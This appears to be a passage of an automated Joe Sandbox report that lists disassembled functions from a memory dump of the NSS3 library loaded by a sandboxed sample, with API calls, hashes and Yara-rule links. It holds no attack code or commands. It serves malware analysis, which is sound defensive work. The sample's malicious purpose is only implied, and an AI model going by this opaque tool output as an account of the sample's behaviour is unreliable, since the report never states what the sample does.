PORT_ArenaGrow_Util.NSS3(83000070,?,?,00000000,?,?,?,?,6BC02403,00000010,?,6BC0990F,0000003B,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-._~:[]@!$'()*+,=&,?,00000000), ref: 6BC09C18
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,6BC02403,00000010,?,6BC0990F,0000003B,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-._~:[]@!$'()*+,=&,?,00000000,00000010,?,6BC02403), ref: 6BC09C67
PORT_ArenaGrow_Util.NSS3(?,?,00000000,?,?,?,?,?,?,6BC02403,00000010,?,6BC0990F,0000003B,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-._~:[]@!$'()*+,=&), ref: 6BC09CA3
memcpy.VCRUNTIME140(?,?,00000000,?,?,?,?,?,6BC02403,00000010,?,6BC0990F,0000003B,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-._~:[]@!$'()*+,=&,?,00000000), ref: 6BC09CEA
PORT_ArenaGrow_Util.NSS3(?,?,00000000,?,?,?,?,?,?,?,?,?,6BC02403,00000010,?,6BC0990F), ref: 6BC09D26
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,6BC02403,00000010,?,6BC0990F,0000003B), ref: 6BC09D70
strchr.VCRUNTIME140(6BC0990F,?), ref: 6BC09DA4
PORT_ArenaGrow_Util.NSS3(6BC02403,?,00000000,?), ref: 6BC09DE7

Part of subcall function 6BC11340: TlsGetValue.KERNEL32(?,00000000,00000000,?,6BBB895A,00000000,?,00000000,?,00000000,?,00000000,?,6BBAF599,?,00000000), ref: 6BC1136A
Part of subcall function 6BC11340: EnterCriticalSection.KERNEL32(B8AC9BDF,?,6BBB895A,00000000,?,00000000,?,00000000,?,00000000,?,6BBAF599,?,00000000), ref: 6BC1137E
Part of subcall function 6BC11340: PL_ArenaGrow.NSS3(?,6BBAF599,?,00000000,?,6BBB895A,00000000,?,00000000,?,00000000,?,00000000,?,6BBAF599,?), ref: 6BC113CF
Part of subcall function 6BC11340: PR_Unlock.NSS3(?,?,6BBB895A,00000000,?,00000000,?,00000000,?,00000000,?,6BBAF599,?,00000000), ref: 6BC1145C

PR_snprintf.NSS3(00000010,00000004,%%%02X,?), ref: 6BC09E0D
PORT_ArenaGrow_Util.NSS3(6BC02403,?,00000000,?), ref: 6BC09E52
realloc.MOZGLUE(?,?), ref: 6BC09E76
realloc.MOZGLUE(?,?), ref: 6BC09EA5
PORT_ArenaGrow_Util.NSS3(6BC02403,00000000,?,00000001,?,?,?,?,?,?,?,?,?,?,?,6BC02403), ref: 6BC09F15
realloc.MOZGLUE(00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,6BC02403), ref: 6BC09F4A
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6BC02403), ref: 6BC09F6A
PORT_ArenaGrow_Util.NSS3(00000000,?,00000000,-00000001), ref: 6BC09FAB
realloc.MOZGLUE(?,-00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6BC09FC2
memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6BC09FE2
free.MOZGLUE(?), ref: 6BC09FFA
PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6BC0A021
free.MOZGLUE(?), ref: 6BC0A040
PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6BC02403), ref: 6BC0A052
PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,6BC02403,00000010,?,6BC0990F,0000003B,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-._~:[]@!$'()*+,=&), ref: 6BC0A078
PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,6BC02403,00000010,?,6BC0990F,0000003B,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-._~:[]@!$'()*+,=&,?,00000000,00000010), ref: 6BC0A08D

Strings

%%%02X, xrefs: 6BC09E02

Memory Dump Source

Source File: 00000001.00000002.2519832778.000000006BB31000.00000020.00000001.01000000.00000014.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000001.00000002.2519814205.000000006BB30000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519987562.000000006BD0E000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520004153.000000006BD0F000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520022892.000000006BD10000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520038961.000000006BD15000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb30000_u5c4.jbxd

Similarity

API ID: Arena$Grow_Util$Errorrealloc$strlen$freememcpy$CriticalEnterGrowR_snprintfSectionUnlockValuestrchr
String ID: %%%02X
API String ID: 4704135-3569721977
Opcode ID: c5baac6d7a504efc1fff589a5941e10a24f257a94ecba01d2ab8067d73a75617
Instruction ID: 0fdebe023de641dee8a781c8519919038d3e3383ecb383bb2995389c63c23e4e
Opcode Fuzzy Hash: c5baac6d7a504efc1fff589a5941e10a24f257a94ecba01d2ab8067d73a75617
Instruction Fuzzy Hash: AFE1E870E112169BDB10CF6DC88069BF7B5FF45354B148268E815A7241FB7AEE11CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6BBEEA00 Relevance: 28.8, APIs: 19, Instructions: 304COMMON

Download Yara Rule

APIs

SECOID_FindOIDByTag_Util.NSS3(?,?,?,?,?,?,?,?,00000000,00000000,00000000,?,6BBF8C9F,00000000,00000000,?), ref: 6BBEEA29

Part of subcall function 6BC10840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6BC108B4

SEC_ASN1EncodeUnsignedInteger_Util.NSS3(00000000,?,000000A0,?,?,?,?,?,?,?,?,00000000,00000000,00000000,?,6BBF8C9F), ref: 6BBEEB01
SEC_ASN1EncodeItem_Util.NSS3(00000000,00000000,?,6BCDC6C4), ref: 6BBEEB28
SEC_ASN1EncodeItem_Util.NSS3(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6BBEEBC6
SECOID_SetAlgorithmID_Util.NSS3(?,?,?,00000000), ref: 6BBEEBDE
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6BBEEBEB
SEC_ASN1EncodeUnsignedInteger_Util.NSS3(00000000,?,00000010,?,?,?,?,?,?,?,?,00000000,00000000,00000000,?,6BBF8C9F), ref: 6BBEEC17
SEC_ASN1EncodeUnsignedInteger_Util.NSS3(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6BBEEC2F
SEC_ASN1EncodeUnsignedInteger_Util.NSS3(00000000,?,00000000), ref: 6BBEEC4B
SEC_ASN1EncodeItem_Util.NSS3(00000000,00000000,?,6BCDC754), ref: 6BBEEC6D
free.MOZGLUE(?), ref: 6BBEEC7F
free.MOZGLUE(00000000), ref: 6BBEEC90
free.MOZGLUE(?), ref: 6BBEECA1
free.MOZGLUE(00000000), ref: 6BBEECBF
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6BBEECD4
SECOID_CopyAlgorithmID_Util.NSS3(?,?,00000000), ref: 6BBF91D5
SECITEM_ZfreeItem_Util.NSS3(-0000000C,00000000), ref: 6BBF91E8
SECITEM_ZfreeItem_Util.NSS3(00000000,00000000), ref: 6BBF91F2
free.MOZGLUE(00000000), ref: 6BBF91FB

Memory Dump Source

Source File: 00000001.00000002.2519832778.000000006BB31000.00000020.00000001.01000000.00000014.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000001.00000002.2519814205.000000006BB30000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519987562.000000006BD0E000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520004153.000000006BD0F000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520022892.000000006BD10000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520038961.000000006BD15000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb30000_u5c4.jbxd

Similarity

API ID: Util$Encode$Item_free$Integer_Unsigned$Zfree$Algorithm$CopyErrorFindTag_
String ID:
API String ID: 899953378-0
Opcode ID: 45f34463ac0d743ce90bbebb47db58111bac3ddbc70b39825311ef85c0ab49f1
Instruction ID: ef707adeba94ed74bea3af0be65758d8348824d7c358b8481cf65e7756ea1d34
Opcode Fuzzy Hash: 45f34463ac0d743ce90bbebb47db58111bac3ddbc70b39825311ef85c0ab49f1
Instruction Fuzzy Hash: 79A1C471A202455BFB40CA79DCC1B7E77A8EB44384F104479E816DB3A1E76DDA42C772

Uniqueness

Uniqueness Score: -1.00%

Function 6BBE0BA0 Relevance: 25.7, APIs: 17, Instructions: 242memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE0B3,00000000), ref: 6BBE0BFA

Part of subcall function 6BC5C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6BC5C2BF

PR_SetError.NSS3(FFFFE005,00000000), ref: 6BBE0C18
PK11_HPKE_DestroyContext.NSS3(?,00000000), ref: 6BBE0C2E
SECKEY_DestroyPrivateKey.NSS3(00000000), ref: 6BBE0C39
SECKEY_DestroyPublicKey.NSS3(?), ref: 6BBE0C45
SECOID_FindOIDByTag_Util.NSS3(?), ref: 6BBE0CC1
PORT_Alloc_Util.NSS3(?), ref: 6BBE0CDA
memcpy.VCRUNTIME140(?,?,?), ref: 6BBE0D1B
PK11_GenerateKeyPairWithOpFlags.NSS3 ref: 6BBE0D79
PR_SetError.NSS3(FFFFE006,00000000), ref: 6BBE0DB2
PK11_CreateContextBySymKey.NSS3(?,82000104,?,?), ref: 6BBE0DE4
PR_SetError.NSS3(FFFFE001,00000000), ref: 6BBE0DFE
PR_SetError.NSS3(FFFFE064,00000000), ref: 6BBE0E2C
SECKEY_DestroyPrivateKey.NSS3(00000000), ref: 6BBE0E38
SECKEY_DestroyPublicKey.NSS3(?), ref: 6BBE0E44
free.MOZGLUE(?), ref: 6BBE0E7E
free.MOZGLUE(?), ref: 6BBE0EAE

Memory Dump Source

Source File: 00000001.00000002.2519832778.000000006BB31000.00000020.00000001.01000000.00000014.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000001.00000002.2519814205.000000006BB30000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519987562.000000006BD0E000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520004153.000000006BD0F000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520022892.000000006BD10000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520038961.000000006BD15000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb30000_u5c4.jbxd

Similarity

API ID: DestroyError$K11_$ContextPrivatePublicUtilfree$Alloc_CreateFindFlagsGeneratePairTag_ValueWithmemcpy
String ID:
API String ID: 2510822978-0
Opcode ID: ccfca52bb39bf80bb4294c70111a18ee16d2ba4da4b7c08ba4ba1a0c6630a2b7
Instruction ID: 5a90bc7c4c13a4370ca9054b57fccf2a58ac7b363725ee6c3a12506ebb573fd2
Opcode Fuzzy Hash: ccfca52bb39bf80bb4294c70111a18ee16d2ba4da4b7c08ba4ba1a0c6630a2b7
Instruction Fuzzy Hash: C991D2B1904380AFD7108F68DC4270BBBE4EF84748F44856DF89997361EB78D955CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6BB31B80 Relevance: 21.4, APIs: 14, Instructions: 415networkCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6BB31BA0
PR_GetIdentitiesLayer.NSS3(?,00000000), ref: 6BB31CBB
select.WSOCK32(00000000,?,?,?,00000000), ref: 6BB31E6B
PR_GetIdentitiesLayer.NSS3(?,00000000,00000000,?,?,?,00000000), ref: 6BB31EB2
__WSAFDIsSet.WSOCK32(?,?), ref: 6BB31EC8
__WSAFDIsSet.WSOCK32(?,?,?,?), ref: 6BB31EDB
__WSAFDIsSet.WSOCK32(?,?,?,?,?,?), ref: 6BB31EEC
PR_IntervalToMicroseconds.NSS3(?), ref: 6BB31F83
PR_SetError.NSS3(FFFFE897,00000000), ref: 6BB3209B
PR_Sleep.NSS3(?), ref: 6BB320BD
WSAGetLastError.WSOCK32(00000000,?,?,?,00000000), ref: 6BB320E5
PR_GetIdentitiesLayer.NSS3(?,00000000,00000000,?,?,?,00000000), ref: 6BB32139
#7.WSOCK32(0000FFFF,0000FFFF,00001008,?,00000004), ref: 6BB32153
WSAGetLastError.WSOCK32(0000FFFF,0000FFFF,00001008,?,00000004), ref: 6BB32176

Memory Dump Source

Source File: 00000001.00000002.2519832778.000000006BB31000.00000020.00000001.01000000.00000014.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000001.00000002.2519814205.000000006BB30000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519987562.000000006BD0E000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520004153.000000006BD0F000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520022892.000000006BD10000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520038961.000000006BD15000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb30000_u5c4.jbxd

Similarity

API ID: ErrorIdentitiesLayer$Last$IntervalMicrosecondsSleepValueselect
String ID:
API String ID: 975171332-0
Opcode ID: 64704d1ff3829a08f0ff01c073978e5e1720e182210f85ea10bf19fdffcc5521
Instruction ID: 727f002b527dd058da98b74ab8ba41139257a5bd503b2b268adbd73f4d814afa
Opcode Fuzzy Hash: 64704d1ff3829a08f0ff01c073978e5e1720e182210f85ea10bf19fdffcc5521
Instruction Fuzzy Hash: E4F1E371D012B48FDB25CF14C89179AB3BDEF41744F0441E9D919AB290E37D9B89CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6BBFA9A0 Relevance: 21.2, APIs: 14, Instructions: 214COMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6BBFA9CA

Part of subcall function 6BC10FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6BBB87ED,00000800,6BBAEF74,00000000), ref: 6BC11000
Part of subcall function 6BC10FF0: PR_NewLock.NSS3(?,00000800,6BBAEF74,00000000), ref: 6BC11016
Part of subcall function 6BC10FF0: PL_InitArenaPool.NSS3(00000000,security,6BBB87ED,00000008,?,00000800,6BBAEF74,00000000), ref: 6BC1102B

SEC_QuickDERDecodeItem_Util.NSS3(00000000,?,6BD10B04,?), ref: 6BBFA9F7

Part of subcall function 6BC0B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6BCE18D0,?), ref: 6BC0B095

PORT_FreeArena_Util.NSS3(00000000,00000001), ref: 6BBFAA0B
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6BBFAA33
PK11_GetInternalKeySlot.NSS3 ref: 6BBFAA55
PK11_Authenticate.NSS3(00000000,00000001,?), ref: 6BBFAA69
PORT_FreeArena_Util.NSS3(00000001,00000001), ref: 6BBFAAD4
PK11_ListFixedKeysInSlot.NSS3(?,00000000,?), ref: 6BBFAB18
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6BBFAB5A
PK11_FreeSymKey.NSS3(00000000), ref: 6BBFAB85
PK11_FreeSymKey.NSS3(00000000), ref: 6BBFAB99
PORT_FreeArena_Util.NSS3(?,00000001), ref: 6BBFABDC
PK11_FreeSymKey.NSS3(?), ref: 6BBFABE9
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6BBFABF7

Part of subcall function 6BBFAC10: PK11_CreateContextBySymKey.NSS3(00000133,00000105,00000000,?,?,6BBFAB3E,?,?,?), ref: 6BBFAC35
Part of subcall function 6BBFAC10: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?,?,6BBFAB3E,?,?,?), ref: 6BBFAC55
Part of subcall function 6BBFAC10: PK11_CipherOp.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,?,6BBFAB3E,?,?), ref: 6BBFAC70
Part of subcall function 6BBFAC10: PK11_GetBlockSize.NSS3(00000133,00000000), ref: 6BBFAC92
Part of subcall function 6BBFAC10: PK11_DestroyContext.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,6BBFAB3E), ref: 6BBFACD7

Memory Dump Source

Source File: 00000001.00000002.2519832778.000000006BB31000.00000020.00000001.01000000.00000014.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000001.00000002.2519814205.000000006BB30000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519987562.000000006BD0E000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520004153.000000006BD0F000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520022892.000000006BD10000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520038961.000000006BD15000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb30000_u5c4.jbxd

Similarity

API ID: K11_$Util$Free$Arena_Item_$Zfree$ArenaContextSlot$Alloc_AuthenticateBlockCipherCreateDecodeDestroyErrorFixedInitInternalKeysListLockPoolQuickSizecalloc
String ID:
API String ID: 2602994911-0
Opcode ID: b0b5ef5e4d2a8373b6d59af466c9626e44c2b3c3e341bb85b1fabfe0521be265
Instruction ID: afbfac1694e74292aea421988cec5336adb1994dd11da999c07dcef1fc170f49
Opcode Fuzzy Hash: b0b5ef5e4d2a8373b6d59af466c9626e44c2b3c3e341bb85b1fabfe0521be265
Instruction Fuzzy Hash: A771E1719087819BD704CF289C81A1FB7BDEF84794F004A29FC6497251FB79D94ACB92

Uniqueness

Uniqueness Score: -1.00%

Function 6BBD09A0 Relevance: 11.0, APIs: 7, Instructions: 489memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 6BBD06A0: TlsGetValue.KERNEL32 ref: 6BBD06C2
Part of subcall function 6BBD06A0: EnterCriticalSection.KERNEL32(?), ref: 6BBD06D6
Part of subcall function 6BBD06A0: PR_Unlock.NSS3 ref: 6BBD06EB

memcmp.VCRUNTIME140(00000000,6BBB9B8A,0000000C,?,?,?,?,?,?,00000000,00000000,?,?,6BBB9B8A,00000000,6BBB2D6B), ref: 6BBD09D9
PORT_ArenaAlloc_Util.NSS3(00000000,0000000C,?,?,?,?,?,?,00000000,00000000,?,?,6BBB9B8A,00000000,6BBB2D6B), ref: 6BBD09F2
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,00000000,00000000,?,?,6BBB9B8A,00000000,6BBB2D6B), ref: 6BBD0A1C
EnterCriticalSection.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000,00000000,?,?,6BBB9B8A,00000000,6BBB2D6B), ref: 6BBD0A30
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,00000000,00000000,?,?,6BBB9B8A,00000000,6BBB2D6B), ref: 6BBD0A48

Memory Dump Source

Source File: 00000001.00000002.2519832778.000000006BB31000.00000020.00000001.01000000.00000014.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000001.00000002.2519814205.000000006BB30000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519987562.000000006BD0E000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520004153.000000006BD0F000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520022892.000000006BD10000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520038961.000000006BD15000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb30000_u5c4.jbxd

Similarity

API ID: CriticalEnterSectionUnlockValue$Alloc_ArenaUtilmemcmp
String ID:
API String ID: 115324291-0
Opcode ID: 6f9ee25d53bcf4685d5466ffe0177181fbcf2959863059fbb4cf12cb7cc02e38
Instruction ID: e70e06e109cbfbe592c75c521c3af214416186d35f9952266c7823a6ccaef93e
Opcode Fuzzy Hash: 6f9ee25d53bcf4685d5466ffe0177181fbcf2959863059fbb4cf12cb7cc02e38
Instruction Fuzzy Hash: 3A02CFB1E006459FEB00CF64DC62BAF7BB9EF48318F440569E905A7252E73DE941CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6BC46BE0 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 196COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6BC46C2C

Part of subcall function 6BC46E90: PR_GetEnvSecure.NSS3(SSLKEYLOGFILE,?,6BC46BF7), ref: 6BC46EB6
Part of subcall function 6BC46E90: fopen.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,6BCEFC0A,6BC46BF7), ref: 6BC46ECD
Part of subcall function 6BC46E90: ftell.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6BC46EE0
Part of subcall function 6BC46E90: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(# SSL/TLS secrets log file, generated by NSS,0000002D,00000001), ref: 6BC46EFC
Part of subcall function 6BC46E90: PR_NewLock.NSS3 ref: 6BC46F04
Part of subcall function 6BC46E90: fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6BC46F18
Part of subcall function 6BC46E90: PR_GetEnvSecure.NSS3(SSLFORCELOCKS,6BC46BF7), ref: 6BC46F30
Part of subcall function 6BC46E90: PR_GetEnvSecure.NSS3(NSS_SSL_ENABLE_RENEGOTIATION,?,6BC46BF7), ref: 6BC46F54

TlsGetValue.KERNEL32 ref: 6BC46D93
PR_GetEnvSecure.NSS3(NSS_SSL_REQUIRE_SAFE_NEGOTIATION,?,?,6BC46BF7), ref: 6BC46FE0
PR_GetEnvSecure.NSS3(NSS_SSL_CBC_RANDOM_IV,?,?,?,6BC46BF7), ref: 6BC46FFD

Strings

NSS_SSL_CBC_RANDOM_IV, xrefs: 6BC46FF8
NSS_SSL_REQUIRE_SAFE_NEGOTIATION, xrefs: 6BC46FDB

Memory Dump Source

Source File: 00000001.00000002.2519832778.000000006BB31000.00000020.00000001.01000000.00000014.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000001.00000002.2519814205.000000006BB30000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519987562.000000006BD0E000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520004153.000000006BD0F000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520022892.000000006BD10000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520038961.000000006BD15000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb30000_u5c4.jbxd

Similarity

API ID: Secure$Value$Lockfclosefopenftellfwrite
String ID: NSS_SSL_CBC_RANDOM_IV$NSS_SSL_REQUIRE_SAFE_NEGOTIATION
API String ID: 3032383292-3007362596
Opcode ID: 08798b22b57d3180ce569d74a52106c73c0b9a4b0f49093826dd6b7d431d9ae1
Instruction ID: 7fc7cfe44d1b5268ca602bf5562abac750d62b7fe03dd7cc762c52169a77b460
Opcode Fuzzy Hash: 08798b22b57d3180ce569d74a52106c73c0b9a4b0f49093826dd6b7d431d9ae1
Instruction Fuzzy Hash: 17714370568904CBEB189B6DC6A252473F1F757744BC001A9C84B8FB89EB38E793C711

Uniqueness

Uniqueness Score: -1.00%

Function 6BC5C9E0 Relevance: 7.7, APIs: 5, Instructions: 187timeCOMMON

Download Yara Rule

APIs

PR_NormalizeTime.NSS3(00000000,?), ref: 6BC5CEA5

Memory Dump Source

Source File: 00000001.00000002.2519832778.000000006BB31000.00000020.00000001.01000000.00000014.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000001.00000002.2519814205.000000006BB30000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519987562.000000006BD0E000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520004153.000000006BD0F000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520022892.000000006BD10000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520038961.000000006BD15000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb30000_u5c4.jbxd

Similarity

API ID: NormalizeTime
String ID:
API String ID: 1467309002-0
Opcode ID: 8e3d099f47725290508f336f913047f85ad6df86f891deae9b1b93a60b7e881c
Instruction ID: a0016ebf27204534506062e093948779478eef4244822b0746a197ca20714736
Opcode Fuzzy Hash: 8e3d099f47725290508f336f913047f85ad6df86f891deae9b1b93a60b7e881c
Instruction Fuzzy Hash: 3171A2719197418FC304CF28C48061BBBE1FF89714F158A6DE4A9CB3A0E774D965CB95

Uniqueness

Uniqueness Score: -1.00%

Function 6BC25B90 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 366COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,00000000,?), ref: 6BC25D55
memcpy.VCRUNTIME140(?,?,?), ref: 6BC25D8B
PR_SetError.NSS3(FFFFD027,00000000), ref: 6BC25F5C

Strings

UUUU, xrefs: 6BC25FC6

Memory Dump Source

Source File: 00000001.00000002.2519832778.000000006BB31000.00000020.00000001.01000000.00000014.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000001.00000002.2519814205.000000006BB30000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519987562.000000006BD0E000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520004153.000000006BD0F000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520022892.000000006BD10000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520038961.000000006BD15000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb30000_u5c4.jbxd

Similarity

API ID: Errormemcpymemset
String ID: UUUU
API String ID: 2691834222-1798160573
Opcode ID: 044bae01d6adf35c34eae1c9a6f023f7c8c725cc881e613ac8185fe6a2789cb0
Instruction ID: ce2921a9ecd9f9b927bc7ce5bb152708068fb7074a5e2aac26fec024507bbf34
Opcode Fuzzy Hash: 044bae01d6adf35c34eae1c9a6f023f7c8c725cc881e613ac8185fe6a2789cb0
Instruction Fuzzy Hash: 06D10370A156118FDB14CF28C8847AB7BF1BF84319F148179E969DB285F739EA42CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6BC80B40 Relevance: 4.6, APIs: 3, Instructions: 92COMMON

Download Yara Rule

APIs

sqlite3_bind_int64.NSS3(?,?,?,?), ref: 6BC80B7C
sqlite3_bind_double.NSS3 ref: 6BC80BF1
sqlite3_bind_zeroblob.NSS3(?,?,00000000), ref: 6BC80C27

Memory Dump Source

Source File: 00000001.00000002.2519832778.000000006BB31000.00000020.00000001.01000000.00000014.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000001.00000002.2519814205.000000006BB30000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519987562.000000006BD0E000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520004153.000000006BD0F000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520022892.000000006BD10000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520038961.000000006BD15000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb30000_u5c4.jbxd

Similarity

API ID: sqlite3_bind_doublesqlite3_bind_int64sqlite3_bind_zeroblob
String ID:
API String ID: 4141409403-0
